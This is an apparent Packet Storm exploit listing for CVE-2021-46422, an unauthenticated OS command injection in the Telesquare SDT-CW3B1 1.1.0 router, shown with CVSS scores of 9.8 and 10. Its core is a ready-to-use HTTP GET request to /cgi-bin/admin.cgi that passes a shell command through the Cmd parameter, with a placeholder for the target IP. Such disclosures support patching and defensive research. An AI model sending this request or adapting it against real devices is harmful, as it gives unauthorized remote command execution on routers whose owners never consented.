Lucene search

K
packetstormAhmed AlrokyPACKETSTORM:167201
HistoryMay 17, 2022 - 12:00 a.m.

SDT-CW3B1 1.1.0 Command Injection

2022-05-1700:00:00
Ahmed Alroky
packetstormsecurity.com
188

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

`# Exploit Title: SDT-CW3B1 1.1.0 - OS command injection  
# Date: 2022-05-12  
# Exploit Author: Ahmed Alroky  
# Author Company : AIactive  
# Version: 1.0.0  
# Vendor home page : http://telesquare.co.kr/  
# Authentication Required: No  
# CVE : CVE-2021-46422  
  
# Tested on: Windows  
  
# HTTP Request  
GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1  
Host: IP_HERE  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36  
Accept: */*  
Referer: http:// IP_HERE /admin/system_command.shtml  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close  
  
`

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

Related for PACKETSTORM:167201